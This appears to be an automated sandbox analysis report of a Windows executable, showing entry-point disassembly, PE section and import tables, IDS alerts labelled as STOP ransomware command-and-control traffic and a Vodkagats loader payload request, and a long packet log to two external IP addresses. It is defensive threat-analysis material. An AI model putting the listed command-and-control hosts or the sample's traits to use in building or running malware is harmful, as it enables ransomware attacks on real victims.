                                                                                                                                                                      jmp 00007F96C11CC79Eh
                                                                                                                                                                      jmp 00007F96C11CCABCh
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      push dword ptr [ebp+18h]
                                                                                                                                                                      push dword ptr [ebp+14h]
                                                                                                                                                                      push dword ptr [ebp+10h]
                                                                                                                                                                      push dword ptr [ebp+0Ch]
                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                      call 00007F96C11CCAFBh
                                                                                                                                                                      int3
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      sub esp, 00000328h
                                                                                                                                                                      mov eax, dword ptr [0050AD20h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                      cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                      push edi
                                                                                                                                                                      je 00007F96C11CC96Bh
                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                      call 00007F96C11DB244h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      and dword ptr [ebp-00000320h], 00000000h
                                                                                                                                                                      lea eax, dword ptr [ebp-0000031Ch]
                                                                                                                                                                      push 0000004Ch
                                                                                                                                                                      push 00000000h
                                                                                                                                                                      push eax
                                                                                                                                                                      call 00007F96C11D3BE3h
                                                                                                                                                                      lea eax, dword ptr [ebp-00000320h]
                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                      mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                      lea eax, dword ptr [ebp-000002D0h]
                                                                                                                                                                      mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                      mov dword ptr [ebp-00000220h], eax
                                                                                                                                                                      mov dword ptr [ebp-00000224h], ecx
                                                                                                                                                                      mov dword ptr [ebp-00000228h], edx
                                                                                                                                                                      mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                                                                      mov dword ptr [ebp-00000230h], esi
                                                                                                                                                                      mov dword ptr [ebp-00000234h], edi
                                                                                                                                                                      mov word ptr [ebp-00000208h], ss
                                                                                                                                                                      mov word ptr [ebp-00000214h], cs
                                                                                                                                                                      mov word ptr [ebp-00000238h], ds
                                                                                                                                                                      mov word ptr [ebp-0000023Ch], es
                                                                                                                                                                      mov word ptr [ebp-00000240h], fs
                                                                                                                                                                      mov word ptr [ebp+0000FDBCh], gs
                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                                                                                      • [ C ] VS2013 UPD5 build 40629
                                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                                      • [LNK] VS2013 UPD5 build 40629
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1085d0 | 0x154 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12b000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12c000 | 0xa32c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xcc460 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x105ac8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xcc000 | 0x3f0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| .text | 0x1000 | 0xca5bc | 0xca600 | False | 0.5030461029184682 | data | 6.570129941575212 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xcc000 | 0x3dba2 | 0x3dc00 | False | 0.3959071356275304 | data | 5.6730677387203405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x10a000 | 0x20358 | 0x6400 | False | 0.4978125 | data | 4.939624310736174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x12b000 | 0x1e0 | 0x200 | False | 0.533203125 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x12c000 | 0xa32c | 0xa400 | False | 0.6199980945121951 | data | 6.612523450234696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x12b060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |
| DLL | Import |
| RPCRT4.dll | RpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA |
| MPR.dll | WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum |
| WININET.dll | InternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA |
| WINMM.dll | timeGetTime |
| SHLWAPI.dll | PathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW |
| KERNEL32.dll | VirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId |
| USER32.dll | PeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage |
| ADVAPI32.dll | RegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam |
| SHELL32.dll | SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA |
| ole32.dll | CoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance |
| OLEAUT32.dll | SysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString |
| IPHLPAPI.DLL | GetAdaptersInfo |
| WS2_32.dll | inet_ntoa, inet_addr, gethostbyname |
| DNSAPI.dll | DnsFree, DnsQuery_W |
| CRYPT32.dll | CryptStringToBinaryA |
| GDI32.dll | DeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap |
| Language of compilation system | Country where language is spoken |
| English | United States |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
| 01/12/24-06:48:00.971760 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49732 | 80 | 192.168.2.4 | 175.120.254.9 |
| 01/12/24-06:48:06.593430 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49740 | 80 | 192.168.2.4 | 175.120.254.9 |
| 01/12/24-06:48:12.962877 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49746 | 80 | 192.168.2.4 | 175.120.254.9 |
| 01/12/24-06:48:01.179520 | TCP | 2020826 | ET TROJAN Potential Dridex.Maldoc Minimal Executable Request | 49734 | 80 | 192.168.2.4 | 186.147.159.149 |
| 01/12/24-06:48:01.179520 | TCP | 2036333 | ET TROJAN Win32/Vodkagats Loader Requesting Payload | 49734 | 80 | 192.168.2.4 | 186.147.159.149 |
| 01/12/24-06:48:04.269814 | TCP | 2020826 | ET TROJAN Potential Dridex.Maldoc Minimal Executable Request | 49735 | 80 | 192.168.2.4 | 175.120.254.9 |
| 01/12/24-06:48:04.269814 | TCP | 2036333 | ET TROJAN Win32/Vodkagats Loader Requesting Payload | 49735 | 80 | 192.168.2.4 | 175.120.254.9 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                      Jan 12, 2024 06:48:01.251403093 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.256072044 CET8049732175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.256252050 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.256253004 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.394026041 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.531085014 CET8049733175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.538846970 CET8049732175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.900572062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.900680065 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901360989 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901424885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901696920 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901711941 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901751995 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901774883 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.062570095 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.062798977 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.063606977 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.063755989 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.063932896 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.064066887 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.064420938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.064487934 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.064956903 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065013885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065429926 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065478086 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065501928 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065547943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065571070 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065615892 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.227077961 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.227268934 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.227658987 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.227824926 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228079081 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228223085 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228358030 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228414059 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228879929 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228940964 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229279041 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229340076 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229367971 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229413033 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229434967 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229480028 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229810953 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229866982 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230375051 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230434895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230802059 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230858088 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230882883 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230938911 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.241998911 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.242177963 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.242456913 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.242652893 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.387993097 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.388056040 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.388660908 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.388709068 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389055014 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389105082 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389175892 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389223099 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389594078 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389648914 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389656067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389704943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390109062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390161037 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390789032 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390856028 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390872955 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390887022 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390918016 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390944958 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.447652102 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.447668076 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.447720051 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448055029 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448103905 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448127985 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448179007 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448257923 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448302984 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448570967 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448582888 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448618889 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448642969 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448689938 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448703051 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448749065 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448838949 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448884964 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449130058 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449176073 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449388981 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449400902 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449436903 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449455976 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449522972 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449572086 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449829102 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449876070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449975014 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450020075 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450046062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450090885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450336933 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450383902 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450388908 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450436115 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450798988 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450810909 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450850010 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450866938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.733747005 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.733812094 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.733999968 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734061003 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.734093904 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734169006 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.734404087 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734483004 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.734487057 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734560966 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.734597921 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734657049 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.734908104 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.734958887 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.735095024 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.735142946 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.735380888 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.735428095 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.735450983 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.735497952 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.735858917 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.735905886 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.735929012 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.735975027 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.736355066 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.736402035 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.736881018 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.736891031 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.736926079 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.736951113 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993057966 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993077040 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993298054 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993356943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993360996 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993391037 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993402004 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993423939 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993448973 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993799925 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993859053 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993879080 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993896961 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.993932009 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.993951082 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994040966 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994066000 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994092941 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994112015 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994245052 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994297028 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994301081 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994352102 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994379044 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994390011 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994438887 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994461060 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.994513988 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.994693995 CET8049734186.147.159.149192.168.2.4
